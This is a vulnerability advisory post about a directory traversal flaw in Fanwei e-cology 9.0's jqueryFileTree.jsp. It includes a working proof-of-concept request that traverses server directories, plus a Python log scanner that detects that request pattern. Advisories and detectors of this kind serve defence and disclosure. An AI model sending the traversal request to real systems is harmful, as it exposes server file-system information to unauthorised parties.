Fanwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability
Vulnerability Description
Fanwei e-cology is an OA (office automation) system built for large and medium-sized enterprises. It supports office work on PC, mobile and WeChat at the same time. The dir parameter of the jqueryFileTree.jsp file is vulnerable to directory traversal. An attacker can use the vulnerability to obtain directory information from the server's file system.
Vulnerability Impact
Fanwei e-cology 9.0
Network surveying and mapping
Vulnerability Reproduction
Login page
Verification PoC
/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
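A defender-side check for this request pattern, as an added example that is not part of the original post: it scans web access logs for requests to jqueryFileTree.jsp whose dir parameter contains a `..` path segment, including percent-encoded and double-encoded forms. The combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Connector path taken from the advisory's PoC request.
POC_PATH = ("/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/"
            "connectors/jqueryFileTree.jsp")
CONNECTOR = "/jqueryfiletree.jsp"  # matched case-insensitively, any deploy path
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(dir_value):
    """True if any '/'- or '\\'-separated segment of the decoded value is '..'."""
    return ".." in re.split(r"[\\/]+", fully_decode(dir_value))

def flag_line(line):
    """Return (path, decoded dir, HTTP status) for a traversal request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not fully_decode(url.path).lower().endswith(CONNECTOR):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("dir", []):
        if has_traversal(value):
            return (url.path, fully_decode(value), int(m.group(2)))
    return None

def scan(lines):
    return [hit for hit in map(flag_line, lines) if hit]

# Constructed sample lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET {POC_PATH}?dir=/page/resource/userfile/../../ HTTP/1.1" 200 512',
    f'203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET {POC_PATH}?dir=%2Fpage%2Fresource%2Fuserfile%2F%252e%252e%2F HTTP/1.1" 200 498',
    f'198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET {POC_PATH}?dir=/page/resource/userfile/ HTTP/1.1" 200 300',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /index.jsp?dir=../ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for path, decoded_dir, status in scan(SAMPLE_LOG):
        print(status, path, decoded_dir)
```

A flagged request with status 200 deserves a closer look than one that returned 403 or 404. The check only sees the query string, so a dir value sent in a POST body needs WAF or application-level logging to be visible.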
This post is licensed under CC BY 4.0 by the author.